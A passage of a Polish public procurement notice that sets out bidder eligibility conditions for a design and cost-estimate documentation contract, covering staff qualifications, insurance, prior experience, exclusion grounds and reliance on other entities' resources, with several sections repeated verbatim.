-zobowiązanie innego podmiotu do ponoszenia solidarnej odpowiedzialności wraz z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia zasobów, do udostępnienia których się zobowiązał, chyba, że za nieudostępnienie zasobów nie ponosi winy.

Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9.3 i 9.4. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 i ust. 2 pkt. 5 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.  

   3. 	Zamawiający oceni jako spełniony warunek nie podlegania wykluczeniu z  
             postępowania na podstawie oświadczenia Wykonawcy o braku podstaw do 
             wykluczenia stanowiącego załącznik nr 7 i 8 do wzoru formularza oferty oraz na 
             podstawie dokumentów przedłożonych przez Wykonawcę, o których mowa w 
             pkt. 9.3. i 9.4. specyfikacji istotnych warunków zamówienia.

   4. 	Wypełnienie przez Wykonawcę formularza oferty oraz spełnienie innych     
             wymagań określonych w specyfikacji istotnych warunków zamówienia będzie  
             stanowiło podstawę oceny ofert. Zamawiający żąda, żeby Wykonawca wykazał, 
             nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w 
             pkt. 8.  siwz.

5. 	Zamawiający wykluczy z postępowania Wykonawcę, w stosunku do którego stwierdzono podstawę wykluczenia z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 24 ust. 1 i art. 24 ust. 2 pkt. 5 ustawy Prawo Zamówień Publicznych oraz tego, który nie spełnia wymaganych warunków oraz jeśli stwierdzi, że dostarczone przez niego informacje mające wpływ lub mogące mieć wpływ na wynik prowadzonego postępowania są nieprawdziwe.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy w niniejszy postepowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
  na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. 
            Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a 
            także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w 
            ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
     Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o 
    
     spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do 
     wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie 
     spełniania warunków w zakresie wskazanym poniżej:1.1.  Ad. dysponowania osobami zdolnymi do wykonania zamówienia:
                          Wykonawca musi wykazać, że dysponuje osobami, które będą wykonywać 
                          dokumentację projektowo-kosztorysową, posiadającymi kwalifikacje 
                          zawodowe, doświadczenie i stosowne uprawnienia budowlane do 
                          projektowania bez ograniczeń w specjalności ogólnobudowlanej, 
                          właściwej do wykonania przedmiotu zamówienia lub odpowiadające ww. 
                          w przypadku uprawnień wydanych przed dniem 30.12.1994 r. oraz  
                          aktualne zaświadczenia o wpisaniu na listę członków właściwej Izby 
                          Samorządu Zawodowego. 
                          Spełnianie ww. warunku oceniane będzie na podstawie przedłożonego w 
                          ofercie wykazu osób (wg wzoru stanowiącego załącznik nr 5 do
                          formularza oferty ). W w/w wykazie należy podać informacje na temat  
                          kwalifikacji zawodowych tych osób, ich uprawnień, doświadczenia i 
                          wykształcenia niezbędnego do wykonania zamówienia,  a także zakresu 
                          wykonywanych przez nich czynności i podstawie do dysponowania nimi. 
                          Wykonawca wybrany do podpisania umowy musi przedłożyć do umowy 
                          uprawnienia osób, które będą wykonywały zamówienie i ich aktualne
                          zaświadczenia o wpisaniu na listę członków właściwej Izby Samorządu 
                          Zawodowego. 1.2. Ocena spełnienia warunku nie podlegania wykluczeniu na podstawie art. 24 ust. 1 w/w ustawy Pzp z postępowania  zostanie dokonana na podstawie oświadczenia Wykonawcy o braku podstaw do wykluczenia stanowiącego załącznik nr 7 do wzoru formularza oferty oraz na podstawie dokumentów przedłożonych przez Wykonawcę, o których mowa w pkt. 9.3., 9.4. siwz i/lub 9.7. SIWZ.

1.3. Ocena spełnienia warunku nie podlegania wykluczeniu na podstawie art.   
            24 ust. 2 pkt. 5 w/w ustawy Pzp z postępowania  zostanie dokonana na 
            podstawie złożenia przez Wykonawcę listy podmiotów należących do tej 
            samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy pzp 
            lub informacji o braku przynależności do grupy kapitałowej - wzór druku 
            stanowi załącznik nr 8 do SIWZ.

      2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
  osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi  stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić   Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji   zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie   podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na potrzeby wykonaniu zamówienia, w formie oryginałów. 
              Zamawiający wymaga aby składany dokument/dokumenty dotyczyły w 
              szczególności:
              - zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację       
 wskazującą, który konkretny zasób jest udostępniany. W przypadku  udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku  udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.). W przypadku udostępnienia potencjału technicznego należy wskazać przekazanie do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia   zdolności finansowych/  przeniesienie własności pieniędzy lub pozostawienie do dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej   odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.

   - sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy   
      wykonywaniu zamówienia,

- charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem, 

- zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,

-zobowiązanie innego podmiotu do ponoszenia solidarnej odpowiedzialności wraz z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia zasobów, do udostępnienia których się zobowiązał, chyba, że za nieudostępnienie zasobów nie ponosi winy.

Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9.3 i 9.4. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 i ust. 2 pkt. 5 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.  

   3. 	Zamawiający oceni jako spełniony warunek nie podlegania wykluczeniu z  
             postępowania na podstawie oświadczenia Wykonawcy o braku podstaw do 
             wykluczenia stanowiącego załącznik nr 7 i 8 do wzoru formularza oferty oraz na 
             podstawie dokumentów przedłożonych przez Wykonawcę, o których mowa w 
             pkt. 9.3. i 9.4. specyfikacji istotnych warunków zamówienia.

   4. 	Wypełnienie przez Wykonawcę formularza oferty oraz spełnienie innych     
             wymagań określonych w specyfikacji istotnych warunków zamówienia będzie  
             stanowiło podstawę oceny ofert. Zamawiający żąda, żeby Wykonawca wykazał, 
             nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w 
             pkt. 8.  siwz.

5. 	Zamawiający wykluczy z postępowania Wykonawcę, w stosunku do którego stwierdzono podstawę wykluczenia z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 24 ust. 1 i art. 24 ust. 2 pkt. 5 ustawy Prawo Zamówień Publicznych oraz tego, który nie spełnia wymaganych warunków oraz jeśli stwierdzi, że dostarczone przez niego informacje mające wpływ lub mogące mieć wpływ na wynik prowadzonego postępowania są nieprawdziwe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
  na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. 
            Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a 
            także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w 
            ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
     Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o 
    
     spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do 
     wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie 
     spełniania warunków w zakresie wskazanym poniżej:1.1. Ad.  sytuacji ekonomicznej i finansowej:
                         Wykonawca musi wykazać, że posiada opłaconą polisę, a w przypadku jej          
                         braku inny dokument  potwierdzający, że Wykonawca jest ubezpieczony od 
                         odpowiedzialności  cywilnej w zakresie prowadzonej działalności 
                         związanej z przedmiotem zamówienia potwierdzającą posiadanie w/w 
                         ubezpieczenia OC przez Wykonawcę na kwotę co najmniej 30.000 PLN.
                         Zamawiający oceni jako spełniony warunek sytuacji ekonomicznej i 
                         finansowej na podstawie opłaconej polisy, a w przypadku jej braku innego 
                         dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od 
                         odpowiedzialności  cywilnej w zakresie prowadzonej działalności 
                         związanej z przedmiotem zamówienia potwierdzającej posiadanie w/w 
                         ubezpieczenia OC przez Wykonawcę na kwotę co najmniej 30.000 PLN.1.2. Ocena spełnienia warunku nie podlegania wykluczeniu na podstawie art. 24 ust. 1 w/w ustawy Pzp z postępowania  zostanie dokonana na podstawie oświadczenia Wykonawcy o braku podstaw do wykluczenia stanowiącego załącznik nr 7 do wzoru formularza oferty oraz na podstawie dokumentów przedłożonych przez Wykonawcę, o których mowa w pkt. 9.3., 9.4. siwz i/lub 9.7. SIWZ.

1.3. Ocena spełnienia warunku nie podlegania wykluczeniu na podstawie art.   
            24 ust. 2 pkt. 5 w/w ustawy Pzp z postępowania  zostanie dokonana na 
            podstawie złożenia przez Wykonawcę listy podmiotów należących do tej 
            samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy pzp 
            lub informacji o braku przynależności do grupy kapitałowej - wzór druku 
            stanowi załącznik nr 8 do SIWZ.

      2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
  osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi  stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić   Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji   zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie   podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na potrzeby wykonaniu zamówienia, w formie oryginałów. 
              Zamawiający wymaga aby składany dokument/dokumenty dotyczyły w 
              szczególności:
              - zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację       
 wskazującą, który konkretny zasób jest udostępniany. W przypadku  udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku  udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.). W przypadku udostępnienia potencjału technicznego należy wskazać przekazanie do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia   zdolności finansowych/  przeniesienie własności pieniędzy lub pozostawienie do dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej   odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.

   - sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy   
      wykonywaniu zamówienia,

- charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem, 

- zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,

-zobowiązanie innego podmiotu do ponoszenia solidarnej odpowiedzialności wraz z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia zasobów, do udostępnienia których się zobowiązał, chyba, że za nieudostępnienie zasobów nie ponosi winy.

Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9.3 i 9.4. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 i ust. 2 pkt. 5 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.  

   3. 	Zamawiający oceni jako spełniony warunek nie podlegania wykluczeniu z  
             postępowania na podstawie oświadczenia Wykonawcy o braku podstaw do 
             wykluczenia stanowiącego załącznik nr 7 i 8 do wzoru formularza oferty oraz na 
             podstawie dokumentów przedłożonych przez Wykonawcę, o których mowa w 
             pkt. 9.3. i 9.4. specyfikacji istotnych warunków zamówienia.

   4. 	Wypełnienie przez Wykonawcę formularza oferty oraz spełnienie innych     
             wymagań określonych w specyfikacji istotnych warunków zamówienia będzie  
             stanowiło podstawę oceny ofert. Zamawiający żąda, żeby Wykonawca wykazał, 
             nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w 
             pkt. 8.  siwz.

5. 	Zamawiający wykluczy z postępowania Wykonawcę, w stosunku do którego stwierdzono podstawę wykluczenia z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 24 ust. 1 i art. 24 ust. 2 pkt. 5 ustawy Prawo Zamówień Publicznych oraz tego, który nie spełnia wymaganych warunków oraz jeśli stwierdzi, że dostarczone przez niego informacje mające wpływ lub mogące mieć wpływ na wynik prowadzonego postępowania są nieprawdziwe.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
  na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. 
            Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a 
            także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w 
            ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
     Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o 
    
     spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do 
     wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie 
     spełniania warunków w zakresie wskazanym poniżej:

1.1.	Ad. wiedza i doświadczenie:
             Wykonawca musi wykazać, że posiada wiedzę i doświadczenie w zakresie 
             realizacji usług stanowiących przedmiot zamówienia, tj. musi wykazać, że  
             w okresie ostatnich trzech lat przed upływem terminu składania ofert, a 
             jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 
             wykonał, a w przypadku świadczeń okresowych lub ciągłych również 
             wykonuje, co najmniej 3 usługi polegające na wykonaniu dokumentacji 
             projektowo-kosztorysowej odpowiadającej przedmiotowi zamówienia,  o 
             wartości nie mniejszej niż 5.000,00 zł brutto każda. 
                           Spełnienie w/w  warunku Zamawiający oceniał będzie na podstawie 
                           załączonego do oferty wykazu wykonanych głównych usług, określonych 
                           w pkt 9.2.2 SIWZ, sporządzonego wg wzoru stanowiącego załącznik nr 4 
                           do formularza oferty i załączonych dowodów, określonych w pkt. 9.2.6. 
                           SIWZ  potwierdzających, że wymienione w nim usługi zostały wykonane w 
                           sposób należyty lub są wykonywane należycie.
             
1.1.  Ad. dysponowania osobami zdolnymi do wykonania zamówienia:
                          Wykonawca musi wykazać, że dysponuje osobami, które będą wykonywać 
                          dokumentację projektowo-kosztorysową, posiadającymi kwalifikacje 
                          zawodowe, doświadczenie i stosowne uprawnienia budowlane do 
                          projektowania bez ograniczeń w specjalności ogólnobudowlanej, 
                          właściwej do wykonania przedmiotu zamówienia lub odpowiadające ww. 
                          w przypadku uprawnień wydanych przed dniem 30.12.1994 r. oraz  
                          aktualne zaświadczenia o wpisaniu na listę członków właściwej Izby 
                          Samorządu Zawodowego. 
                          Spełnianie ww. warunku oceniane będzie na podstawie przedłożonego w 
                          ofercie wykazu osób (wg wzoru stanowiącego załącznik nr 5 do
                          formularza oferty ). W w/w wykazie należy podać informacje na temat  
                          kwalifikacji zawodowych tych osób, ich uprawnień, doświadczenia i 
                          wykształcenia niezbędnego do wykonania zamówienia,  a także zakresu 
                          wykonywanych przez nich czynności i podstawie do dysponowania nimi. 
                          Wykonawca wybrany do podpisania umowy musi przedłożyć do umowy 
                          uprawnienia osób, które będą wykonywały zamówienie i ich aktualne
                          zaświadczenia o wpisaniu na listę członków właściwej Izby Samorządu 
                          Zawodowego. 
 
             1.1. Ad.  sytuacji ekonomicznej i finansowej:
                         Wykonawca musi wykazać, że posiada opłaconą polisę, a w przypadku jej          
                         braku inny dokument  potwierdzający, że Wykonawca jest ubezpieczony od 
                         odpowiedzialności  cywilnej w zakresie prowadzonej działalności 
                         związanej z przedmiotem zamówienia potwierdzającą posiadanie w/w 
                         ubezpieczenia OC przez Wykonawcę na kwotę co najmniej 30.000 PLN.
                         Zamawiający oceni jako spełniony warunek sytuacji ekonomicznej i 
                         finansowej na podstawie opłaconej polisy, a w przypadku jej braku innego 
                         dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od 
                         odpowiedzialności  cywilnej w zakresie prowadzonej działalności 
                         związanej z przedmiotem zamówienia potwierdzającej posiadanie w/w 
                         ubezpieczenia OC przez Wykonawcę na kwotę co najmniej 30.000 PLN.

  1.2. Ocena spełnienia warunku nie podlegania wykluczeniu na podstawie art. 24 ust. 1 w/w ustawy Pzp z postępowania  zostanie dokonana na podstawie oświadczenia Wykonawcy o braku podstaw do wykluczenia stanowiącego załącznik nr 7 do wzoru formularza oferty oraz na podstawie dokumentów przedłożonych przez Wykonawcę, o których mowa w pkt. 9.3., 9.4. siwz i/lub 9.7. SIWZ.

1.3. Ocena spełnienia warunku nie podlegania wykluczeniu na podstawie art.   
            24 ust. 2 pkt. 5 w/w ustawy Pzp z postępowania  zostanie dokonana na 
            podstawie złożenia przez Wykonawcę listy podmiotów należących do tej 
            samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy pzp 
            lub informacji o braku przynależności do grupy kapitałowej - wzór druku 
            stanowi załącznik nr 8 do SIWZ.

      2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
  osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi  stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić   Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji   zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie   podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na potrzeby wykonaniu zamówienia, w formie oryginałów. 
              Zamawiający wymaga aby składany dokument/dokumenty dotyczyły w 
              szczególności:
              - zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację       
 wskazującą, który konkretny zasób jest udostępniany. W przypadku  udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku  udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.). W przypadku udostępnienia potencjału technicznego należy wskazać przekazanie do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia   zdolności finansowych/  przeniesienie własności pieniędzy lub pozostawienie do dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej   odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.

   - sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy   
      wykonywaniu zamówienia,

- charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem, 

- zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,

-zobowiązanie innego podmiotu do ponoszenia solidarnej odpowiedzialności wraz z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia zasobów, do udostępnienia których się zobowiązał, chyba, że za nieudostępnienie zasobów nie ponosi winy.

Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9.3 i 9.4. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 i ust. 2 pkt. 5 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.  

   3. 	Zamawiający oceni jako spełniony warunek nie podlegania wykluczeniu z  
             postępowania na podstawie oświadczenia Wykonawcy o braku podstaw do 
             wykluczenia stanowiącego załącznik nr 7 i 8 do wzoru formularza oferty oraz na 
             podstawie dokumentów przedłożonych przez Wykonawcę, o których mowa w 
             pkt. 9.3. i 9.4. specyfikacji istotnych warunków zamówienia.

   4. 	Wypełnienie przez Wykonawcę formularza oferty oraz spełnienie innych     
             wymagań określonych w specyfikacji istotnych warunków zamówienia będzie  
             stanowiło podstawę oceny ofert. Zamawiający żąda, żeby Wykonawca wykazał, 
             nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w 
             pkt. 8.  siwz.

5. 	Zamawiający wykluczy z postępowania Wykonawcę, w stosunku do którego stwierdzono podstawę wykluczenia z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 24 ust. 1 i art. 24 ust. 2 pkt. 5 ustawy Prawo Zamówień Publicznych oraz tego, który nie spełnia wymaganych warunków oraz jeśli stwierdzi, że dostarczone przez niego informacje mające wpływ lub mogące mieć wpływ na wynik prowadzonego postępowania są nieprawdziwe.

 Oferta oraz dokumenty i oświadczenia, wymagane w postępowaniu .
    1. Wykonawca musi dołączyć do oferty w terminie wskazanym w pkt. 17. 
             specyfikacji istotnych warunków zamówienia i w formie określonej w  
             specyfikacji:
1.1. 	wypełniony i podpisany formularz oferty zgodny w treści ze wzorem stanowiącym Rozdział II specyfikacji istotnych warunków zamówienia, 
1.2. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 9.6.1.2.  specyfikacji, jeżeli oferty będą składali Wykonawcy wspólnie ubiegający się o udzielenie zamówienia,  
1.3. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 14.6.3.  specyfikacji, jeśli oferta będzie podpisana przez pełnomocnika,
